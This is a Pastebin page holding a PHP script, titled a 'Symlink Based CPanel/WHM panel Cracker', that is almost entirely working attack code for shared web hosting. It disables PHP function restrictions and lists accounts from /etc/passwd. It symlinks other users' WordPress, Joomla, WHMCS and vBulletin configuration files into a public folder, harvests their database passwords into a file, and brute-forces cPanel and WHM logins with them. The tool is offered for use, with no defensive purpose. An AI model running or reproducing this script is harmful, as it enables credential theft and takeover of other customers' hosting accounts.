API tools faq
paste
Advertisement
HKFl

whm.php

HKFl
Sep 15th, 2017
1,003
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.04 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $head = '
  4. <html>
  5. <head>
  6. </script>
  7. <title>Symlink Based CPanel/WHM panel Cracker</title>
  8.  
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11. <STYLE>
  12. body {
  13. font-family: Tahoma
  14. }
  15. tr {
  16. BORDER: dashed 1px #333;
  17. color: #FFF;
  18. }
  19. td {
  20. BORDER: dashed 1px #333;
  21. color: #FFF;
  22. }
  23. .table1 {
  24. BORDER: 0px Black;
  25. BACKGROUND-COLOR: Black;
  26. color: #FFF;
  27. }
  28. .td1 {
  29. BORDER: 0px;
  30. BORDER-COLOR: #333333;
  31. font: 7pt Verdana;
  32. color: Green;
  33. }
  34. .tr1 {
  35. BORDER: 0px;
  36. BORDER-COLOR: #333333;
  37. color: #FFF;
  38. }
  39. table {
  40. BORDER: dashed 1px #333;
  41. BORDER-COLOR: #333333;
  42. BACKGROUND-COLOR: Black;
  43. color: #FFF;
  44. }
  45. input {
  46. border : solid 3px ;
  47. border-color : #333;
  48. BACKGROUND-COLOR: white;
  49. font: 11pt Verdana;
  50. color: #333;
  51. }
  52. select {
  53. BORDER-RIGHT: Black 1px solid;
  54. BORDER-TOP: #DF0000 1px solid;
  55. BORDER-LEFT: #DF0000 1px solid;
  56. BORDER-BOTTOM: Black 1px solid;
  57. BORDER-color: #FFF;
  58. BACKGROUND-COLOR: Black;
  59. font: 8pt Verdana;
  60. color: Red;
  61. }
  62. submit {
  63. BORDER: buttonhighlight 2px outset;
  64. BACKGROUND-COLOR: Black;
  65. width: 30%;
  66. color: #FFF;
  67. }
  68. textarea {
  69. border : dashed 1px #333;
  70. BACKGROUND-COLOR: Black;
  71. font: Fixedsys bold;
  72. color: #999;
  73. }
  74. BODY {
  75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  76. margin: 1px;
  77. color: Red;
  78. background-color: Black;
  79. }
  80. .main {
  81. margin : -287px 0px 0px -490px;
  82. BORDER: dashed 1px #333;
  83. BORDER-COLOR: #333333;
  84. }
  85. .tt {
  86. background-color: Black;
  87. }
  88.  
  89. A:link {
  90. COLOR: White; TEXT-DECORATION: none
  91. }
  92. A:visited {
  93. COLOR: White; TEXT-DECORATION: none
  94. }
  95. A:hover {
  96. color: Red; TEXT-DECORATION: none
  97. }
  98. A:active {
  99. color: Red; TEXT-DECORATION: none
  100. }
  101. </STYLE>
  102. <script language=\'javascript\'>
  103. function hide_div(id)
  104. {
  105. document.getElementById(id).style.display = \'none\';
  106. document.cookie=id+\'=0;\';
  107. }
  108. function show_div(id)
  109. {
  110. document.getElementById(id).style.display = \'block\';
  111. document.cookie=id+\'=1;\';
  112. }
  113. function change_divst(id)
  114. {
  115. if (document.getElementById(id).style.display == \'none\')
  116. show_div(id);
  117. else
  118. hide_div(id);
  119. }
  120. </script>'; ?>
  121. <html>
  122. <head>
  123.  
  124. <link rel="SHORTCUT ICON" type="image/x-icon" href="http://s13.postimg.org/d82nq5frb/UBHFinal1.png"><center>
  125. <a href="#"> <img src="http://aj3dx.altervista.org/anonymous-psn-hacker.jpg" border="0"></center></a>
  126.  
  127. <h2><center>Symlink Based CPanel/WHM panel Cracker</center></h2>
  128. <?php
  129. echo $head ;
  130. echo '
  131.  
  132. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  133.  
  134. </td></tr><tr><td
  135. width="100%" align="center" valign="top" rowspan="1"><font
  136. color="red" face="arial"size="1"><b>
  137.  
  138. ';
  139.  
  140. ?>
  141. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="arial">
  142. <form method=post>
  143. <input type=submit name=ini value="Generate PHP.ini" /></form>
  144. <?php
  145. if(isset($_POST['ini']))
  146. {
  147.  
  148. $r=fopen('php.ini','w');
  149. $rr=" disable_functions=none ";
  150. fwrite($r,$rr);
  151. $link="<a href=php.ini><font color=white size=2 face=\"arial\"><u>link to php.ini file</u></font></a>";
  152. echo $link;
  153.  
  154. }
  155. ?>
  156. <?php
  157.  
  158. ?>
  159. <form method=post>
  160. <input type=submit name="usre" value="Extract Usernames" /></form>
  161.  
  162.  
  163.  
  164.  
  165. <?php
  166. if(isset($_POST['usre'])){
  167. ?><form method=post>
  168. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  169. foreach($users as $user)
  170. {
  171. $str=explode(":",$user);
  172. echo $str[0]."\n";
  173. }
  174.  
  175. ?></textarea><br><br>
  176. <input type=submit name=su value="Start" /></form>
  177. <?php } ?>
  178. <?php
  179. error_reporting(0);
  180. echo "<font color=red size=2 face=\"arial\">";
  181. if(isset($_POST['su']))
  182. {
  183.  
  184. $dir=mkdir('BT',0777);
  185. $r = " Options all \n DirectoryIndex BT.html \n Require None \n Satisfy Any";
  186. $f = fopen('BT/.htaccess','w');
  187.  
  188. fwrite($f,$r);
  189. $consym="<a href=BT/><font color=white size=3 face=\"arial\">Configuration files</font></a>";
  190. echo "<br>Folder Where Config Files has been Symlinked<br><u><font color=red size=2 face=\"arial\">$consym</font></u>";
  191.  
  192. $usr=explode("\n",$_POST['user']);
  193.  
  194. foreach($usr as $uss )
  195. {
  196. $us=trim($uss);
  197.  
  198. $r="BT/";
  199. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  200. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  201. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  202. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  203. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  204. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  205. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  206. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  207. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  208. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  209. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  210. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  211. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  212. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  213. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  214. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  215. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  216. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  217. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  218. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  219. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  220. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  221. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  222. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  223. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  224. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  225. }
  226. }
  227. ?>
  228. <?php
  229.  
  230. ?>
  231.  
  232. <form method=post>
  233. <input type=submit name=sm value="Grab Passwords from Configuration files"></form>
  234. <?php
  235. error_reporting(0);
  236. set_time_limit(0);
  237. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  238. {
  239.  
  240. $ar0=explode($marqueurDebutLien, $text);
  241. $ar1=explode($marqueurFinLien, $ar0[1]);
  242. $ar=trim($ar1[0]);
  243. return $ar;
  244. }
  245.  
  246. if(isset($_POST['sm']))
  247.  
  248. {
  249.  
  250. echo '<font color=green>OK++';
  251.  
  252. $ffile=fopen('BT.txt','a+');
  253.  
  254.  
  255. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/BT/";
  256. $re=$r;
  257. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  258.  
  259. $users=file("/etc/passwd");
  260. foreach($users as $user)
  261. {
  262.  
  263. $str=explode(":",$user);
  264. $usersss=$str[0];
  265. foreach($confi as $co)
  266. {
  267.  
  268.  
  269. $uurl=$re.$usersss.$co;
  270. $uel=$uurl;
  271.  
  272. $ch = curl_init();
  273.  
  274. curl_setopt($ch, CURLOPT_URL, $uel);
  275. curl_setopt($ch, CURLOPT_HEADER, 1);
  276. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  277. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  278. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  279. $result['EXE'] = curl_exec($ch);
  280. curl_close($ch);
  281. $uxl=$result['EXE'];
  282.  
  283.  
  284. if($uxl && preg_match('/table_prefix/i',$uxl))
  285. {
  286.  
  287. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Wordpress </font></td></tr></table>";
  288.  
  289. echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  290. if(!empty($dbp))
  291. $pass=$dbp."\n";
  292. fwrite($ffile,$pass);
  293.  
  294. }
  295. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  296. {
  297.  
  298. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Whmcs </font></td></tr></table>";
  299.  
  300. echo $dbp=entre2v2($uxl,"db_password = '","';");
  301. if(!empty($dbp))
  302. $pass=$dbp."\n";
  303. fwrite($ffile,$pass);
  304.  
  305. }
  306.  
  307.  
  308. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  309. {
  310.  
  311. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is Joomla </font></td></tr></table>";
  312.  
  313. echo $db=entre2v2($uxl,"password = '","';");
  314. if(!empty($db))
  315. $pass=$db."\n";
  316. fwrite($ffile,$pass);
  317. }
  318. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  319. {
  320.  
  321. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> $usersss User's CMS is vbulletin </font></td></tr></table>";
  322.  
  323. echo $db=entre2v2($uxl,"password'] = '","';");
  324. if(!empty($db))
  325. $pass=$db."\n";
  326. fwrite($ffile,$pass);
  327.  
  328. }
  329. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  330. {
  331.  
  332. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  333.  
  334. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  335. if(!empty($db))
  336. $pass=$db."\n";
  337. fwrite($ffile,$pass);
  338. }
  339. elseif($uxl && preg_match('/dbpass/i',$uxl))
  340. {
  341.  
  342. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  343.  
  344. echo $db=entre2v2($uxl,"dbpass = '","';");
  345. if(!empty($db))
  346. $pass=$db."\n";
  347. fwrite($ffile,$pass);
  348. }
  349. elseif($uxl && preg_match('/dbpass/i',$uxl))
  350. {
  351.  
  352. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  353.  
  354. echo $db=entre2v2($uxl,"dbpass = '","';");
  355. if(!empty($db))
  356. $pass=$db."\n";
  357. fwrite($ffile,$pass);
  358.  
  359. }
  360. elseif($uxl && preg_match('/dbpass/i',$uxl))
  361. {
  362.  
  363. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='arial'> Got Config File for Unknwon CMS of User $usersss </font></td></tr></table>";
  364.  
  365. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  366. if(!empty($db))
  367. $pass=$db."\n";
  368. fwrite($ffile,$pass);
  369. }
  370.  
  371.  
  372. }
  373. }
  374. }
  375. ?>
  376. <?php
  377.  
  378. ?>
  379.  
  380.  
  381. <form method=post>
  382. <input type=submit name=cpanel value="Auto CPanel/WHM panel cracker"><p>
  383. <?php
  384.  
  385. if(isset($_POST['cpanel']))
  386. {
  387. ?>
  388. <form method=post><div align=center><table>
  389. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  390. <option name="op" value="whm">WHMPanel</option></table><p>
  391. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  392. foreach($users as $user)
  393. {
  394. $str=explode(":",$user);
  395. echo $str[0]."\n";
  396. }
  397.  
  398. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  399. <?php
  400.  
  401. $d=getcwd()."/BT.txt";
  402. $pf=file($d);
  403. foreach($pf as $rt)
  404. {
  405. $str=explode('\n',$rt);
  406. echo trim($str[0])."\n";
  407. } ?></textarea><p>
  408. <input type=submit name=cpanelcracking value="Start"></form>
  409. <?php
  410. }
  411. ?>
  412.  
  413.  
  414.  
  415.  
  416. <?php
  417. error_reporting(0);
  418. $connect_timeout=5;
  419. set_time_limit(0);
  420.  
  421. $userl=$_POST['usernames'];
  422. $passl=$_POST['passwords'];
  423. $attack=$_POST['op'];
  424. $target = "localhost";
  425.  
  426. if(isset($_POST['cpanelcracking']))
  427. {
  428. if($userl!=="" && $passl!=="")
  429. {
  430. if($_POST["op"]=="cp")
  431. {
  432. $cracked=$_POST['crack'];
  433. @fopen($cracked,'a');
  434. echo "Attacking CPanel....please wait till the end of process \n";
  435.  
  436.  
  437. }
  438. elseif($_POST["op"]=="whm")
  439. {
  440. @fopen($cracked,'a');
  441. echo "Attacking WHM panel....please wait till the end of process";
  442.  
  443. }
  444.  
  445. function cpanel($host,$user,$pass,$timeout){
  446. $ch = curl_init();
  447. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  448. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  449. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  450. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  451. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  452. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  453. $data = curl_exec($ch);
  454. if ( curl_errno($ch) == 0 ){
  455. echo "<table width=100% ><tr><td align=center><b></font>
  456.  
  457. <font color=red size=2> Cracked </font>
  458.  
  459. <font color=white size=2> Username is </font>
  460.  
  461. <font color=green size=2> $user</font>
  462.  
  463. <font color=red size=2> & </font>
  464.  
  465. <font color=white size=2> Password is </font>
  466.  
  467. <font color=green size=2> $pass </font>
  468.  
  469. </font></b></td></tr></table>";
  470.  
  471. }
  472.  
  473. curl_close($ch);}
  474.  
  475. $userlist=explode("\n",$userl);
  476. $passlist=explode("\n",$passl);
  477.  
  478. if ($attack == "cp")
  479. {
  480. foreach ($userlist as $user) {
  481. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  482. $finaluser = trim($user);
  483. foreach ($passlist as $password ) {
  484. $finalpass = trim($password);
  485.  
  486.  
  487. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  488.  
  489. }
  490. }
  491.  
  492. }
  493.  
  494. function whm($host,$user,$pass,$timeout){
  495. $ch = curl_init();
  496. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  497. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  498. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  499. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  500. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  501. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  502. $data = curl_exec($ch);
  503. if ( curl_errno($ch) == 0 ){
  504. echo "<table width=100% ><tr><td align=center><b></font>
  505.  
  506. <font color=red size=2> Cracked </font>
  507.  
  508. <font color=white size=2> Username is </font>
  509.  
  510. <font color=green size=2> $user</font>
  511.  
  512. <font color=red size=2> & </font>
  513.  
  514. <font color=white size=2> Password is </font>
  515.  
  516. <font color=green size=2> $pass </font>
  517.  
  518. </font></b></td></tr></table>";
  519.  
  520.  
  521.  
  522.  
  523. }
  524.  
  525.  
  526. curl_close($ch);}
  527. $userlist=explode("\n",$userl);
  528. $passlist=explode("\n",$passl);
  529.  
  530. if ($attack == "whm")
  531. {
  532. foreach ($userlist as $user) {
  533. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
  534. $finaluser = trim($user);
  535. foreach ($passlist as $password ) {
  536. $finalpass = trim($password);
  537.  
  538. whm($target,$finaluser,$finalpass,$connect_timeout);
  539. }
  540. }
  541. }
  542. }
  543. elseif($userl=="")
  544. {
  545. echo "you have left userlist field empty";
  546.  
  547. }
  548. elseif($passl=="")
  549. {
  550.  
  551. echo "please put passwords in paasword list field";
  552. }
  553. }
  554. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!